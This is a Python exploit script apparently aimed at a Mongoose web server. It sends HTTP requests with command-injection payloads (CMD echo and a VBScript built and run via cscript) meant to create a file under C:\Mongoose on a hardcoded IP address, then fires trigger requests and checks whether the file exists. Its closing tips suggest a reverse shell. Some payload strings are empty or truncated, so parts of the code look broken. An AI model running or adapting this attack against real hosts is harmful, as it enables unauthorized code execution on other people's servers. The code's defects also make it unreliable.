#!/usr/bin/env python3 # Mongoose File Creation Exploit # For authorized penetration testing import socket import time import sys def inject_file_creation_payload(target_ip, target_port, filename="baba.html", content="win"): """Inject payload to create a file with specified content""" print(f"[*] Injecting payload to create {filename} with content: '{content}'") # PowerShell payload to create file payload = f"" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, int(target_port))) request = f"GET {payload} HTTP/1.1\r\nHost: {target_ip}\r\n\r\n" sock.send(request.encode()) response = sock.recv(1024) sock.close() print("[+] File creation payload injected successfully") return True except Exception as e: print(f"[-] Failed to inject file creation payload: {e}") return False def inject_alternative_file_payloads(target_ip, target_port, filename="baba.html", content="win"): """Inject multiple file creation payloads for better compatibility""" print("[*] Injecting alternative file creation payloads...") # CMD echo method cmd_payload = f"\\tC:\\\\Mongoose\\\\{filename}\");?>" # Python method python_payload = f"" # VBScript method via CMD vbs_payload = f"\\tC:\\\\temp\\\\createfile.vbs&&echo\\tSet\\ta=fs.CreateTextFile(^\"C:\\\\Mongoose\\\\{filename}^\",True)\\t>>\\tC:\\\\temp\\\\createfile.vbs&&echo\\ta.WriteLine(^\"{content}^\")\\t>>\\tC:\\\\temp\\\\createfile.vbs&&echo\\ta.Close\\t>>\\tC:\\\\temp\\\\createfile.vbs&&cscript\\tC:\\\\temp\\\\createfile.vbs\");?>" payloads = [ ("CMD Echo", cmd_payload), ("Python", python_payload), ("VBScript", vbs_payload) ] for name, payload in payloads: try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, int(target_port))) request = f"GET {payload} HTTP/1.1\r\nHost: {target_ip}\r\n\r\n" sock.send(request.encode()) sock.recv(1024) sock.close() print(f"[+] {name} file creation payload injected") except Exception as e: print(f"[-] Failed to inject {name} payload: {e}") def trigger_payload_execution(target_ip, target_port): """Trigger payload execution with multiple requests""" print("[*] Triggering payload execution...") endpoints = ["/", "/index.html", "/test.php", "/admin", "/cgi-bin/test.cgi", "/favicon.ico"] for i, endpoint in enumerate(endpoints): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_ip, int(target_port))) request = f"GET {endpoint} HTTP/1.1\r\nHost: {target_ip}\r\n\r\n" sock.send(request.encode()) response = sock.recv(1024) sock.close() print(f"[+] Trigger #{i+1} sent to {endpoint}") time.sleep(0.5) except Exception as e: print(f"[-] Trigger failed for {endpoint}: {e}") def verify_file_creation(target_ip, target_port, filename="baba.html"): """Attempt to verify file creation by requesting the file""" print(f"[*] Attempting to verify creation of {filename}...") try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, int(target_port))) request = f"GET /{filename} HTTP/1.1\r\nHost: {target_ip}\r\n\r\n" sock.send(request.encode()) response = sock.recv(4096) sock.close() response_str = response.decode('utf-8', errors='ignore') if "win" in response_str: print("[+] SUCCESS: File creation verified!") print(f" Content: {response_str[:100]}...") return True elif "404" in response_str: print("[-] File not found (404 error)") return False else: print(f"[!] File may exist but content differs. Response: {response_str[:100]}...") return False except Exception as e: print(f"[-] Failed to verify file creation: {e}") return False def main(): target_ip = "82.150.175.250" target_port = "8080" filename = "baba.html" content = "win" print("="*70) print("MONGOOSE FILE CREATION EXPLOIT") print("="*70) print(f"Target: {target_ip}:{target_port}") print(f"File to create: {filename}") print(f"Content: '{content}'") print("") # Inject primary PowerShell file creation payload print("[STAGE 1] Injecting primary file creation payload...") if not inject_file_creation_payload(target_ip, target_port, filename, content): print("[-] Failed to inject primary payload") # Inject alternative payloads for better compatibility print("[STAGE 2] Injecting alternative file creation payloads...") inject_alternative_file_payloads(target_ip, target_port, filename, content) # Multiple triggers to activate payloads print("[STAGE 3] Triggering payload execution...") for i in range(3): print(f"[*] Execution round {i+1}/3") trigger_payload_execution(target_ip, target_port) time.sleep(3) # Wait a moment for file creation print("[*] Waiting 10 seconds for file creation...") time.sleep(10) # Verify file creation print("[STAGE 4] Verifying file creation...") if verify_file_creation(target_ip, target_port, filename): print("\n[+] EXPLOIT SUCCESSFUL!") print(f"[*] File '{filename}' with content '{content}' created on target") print(f"[*] Access it at: http://{target_ip}:{target_port}/{filename}") else: print("\n[-] File creation could not be verified") print("[*] Possible reasons:") print(" 1. Payload execution failed") print(" 2. Insufficient privileges") print(" 3. File path is incorrect") print(" 4. Antivirus/security software blocked the operation") print(" 5. Target directory is not writable") print("") print("[*] Try these troubleshooting steps:") print(" - Check if C:\\Mongoose directory exists and is writable") print(" - Try creating file in web root directory") print(" - Use reverse shell to manually create the file") if __name__ == "__main__": main()